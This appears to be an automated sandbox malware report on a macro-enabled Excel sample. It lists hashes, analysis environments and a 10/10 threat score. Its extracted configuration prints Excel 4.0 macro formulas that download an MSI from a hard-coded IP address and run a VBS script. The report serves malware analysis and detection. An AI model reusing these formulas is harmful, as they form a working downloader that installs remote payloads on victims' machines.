General
-
Target
f9c430c306834c158889f954dee30533_JaffaCakes118
-
Size
6KB
-
Sample
240419-hv1xqscd4y
-
MD5
f9c430c306834c158889f954dee30533
-
SHA1
036901f031a0085cf830b5fe180702a1c1c3529b
-
SHA256
46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82
-
SHA512
82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8
-
SSDEEP
192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY
Static task
static1
Behavioral task
behavioral1
Sample
f9c430c306834c158889f954dee30533_JaffaCakes118.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f9c430c306834c158889f954dee30533_JaffaCakes118.xlsm
Resource
win10v2004-20240412-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()
Extracted
http://46.17.98.187
Targets
-
-
Target
f9c430c306834c158889f954dee30533_JaffaCakes118
-
Size
6KB
-
MD5
f9c430c306834c158889f954dee30533
-
SHA1
036901f031a0085cf830b5fe180702a1c1c3529b
-
SHA256
46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82
-
SHA512
82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8
-
SSDEEP
192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-